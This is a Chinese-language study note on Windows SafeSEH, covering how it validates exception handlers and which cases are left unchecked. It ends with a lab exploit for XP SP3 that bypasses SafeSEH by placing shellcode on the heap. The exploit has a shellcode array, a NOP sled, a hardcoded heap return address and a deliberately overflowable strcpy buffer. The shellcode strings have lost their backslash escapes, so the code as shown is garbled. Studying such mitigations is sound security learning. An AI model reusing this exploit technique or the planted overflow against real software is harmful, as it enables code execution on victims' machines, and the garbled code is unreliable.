SafeSEH 原理:在程序调用异常处理函数前,对要调用的的异常处理函数进行一系列的有效性检测
VS2003后续版本 默认启用的
编译器将所有的额SEH中所有的异常处理函数的值提取出来编入一张安全SEH 表
将这张表放到程序的映像中
当程序调用异常处理的时候会将函数地址与安全SEH表进行匹配 检查调用的异常处理函数是否位于安全SEH表
VS2008 命令行:
好像只有release版本能行
dumpbin /loadconfig 程序
SfeSEH机制 保护:
检查的重点是
1在加载模块中 ,是否存在 Load Configuration Directory 如果没有就可以执行
2是否在加载模块地址范围之外,在之外就可以执行
3栈中地址覆盖SEH不会执行,但是堆中地址可以执行
1 检查异常处理链是否位于当前程序栈中,如果不在当前栈中,程序会终止异常处理函数的调用
2 检查异常处理函数指针是否指向当前程序栈中,指向程序栈就终止异常处理函数的调用
3 经过前面两项检查后,程序调用一个全新的函数 RtlIsValidHandler(),来对异常处理函数的有效性进行验证
····看书吧 太多了
下面才开始进行本次的实验:
SEH的异常处理函数指向 堆区
及时发现了SEH不可信 仍然会调用其已被修改过的异常处理函数
因此只要将shellcode不知道堆区中就可以直接跳转执行了。 SafeSEH对堆区是特殊处理的,shellcode没用放在栈中而是放在堆中!!!
/*
XP SP3
VS2008 SafeSEH 保护
从堆中绕过 SafeSEH:
*/
#include <stdafx.h>
#include <windows.h>
char shellcode[]=
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"//168
"x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90"
"xB8x31x39x00"
//003931B8
;
void test(char *input)
{
char str[200];
strcpy(str,input);
int zero = 0;
zero = 1/ zero;
}
int main()
{
char * buf = (char *)malloc(500);
//__asm int 3
strcpy(buf,shellcode);
test(buf);
}